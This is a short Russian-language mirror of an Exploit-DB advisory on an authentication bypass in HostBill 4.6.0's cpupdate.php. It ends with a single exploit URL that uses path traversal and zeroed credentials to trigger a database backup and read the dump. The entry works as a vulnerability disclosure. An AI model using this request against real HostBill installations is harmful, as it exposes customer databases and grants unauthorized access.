- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38628
- Проверка EDB
-
- Пройдено
- Автор
- LOCALHOST.RE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2013-05-29
HostBill - 'cpupdate.php' Authentication Bypass
Код:
source: https://www.securityfocus.com/bid/60958/info
HostBill is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to gain unauthorized access to the affected application and disclose sensitive information.
HostBill 4.6.0 is vulnerable; other versions may also be affected.
www.example.com/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0- Источник
- www.exploit-db.com
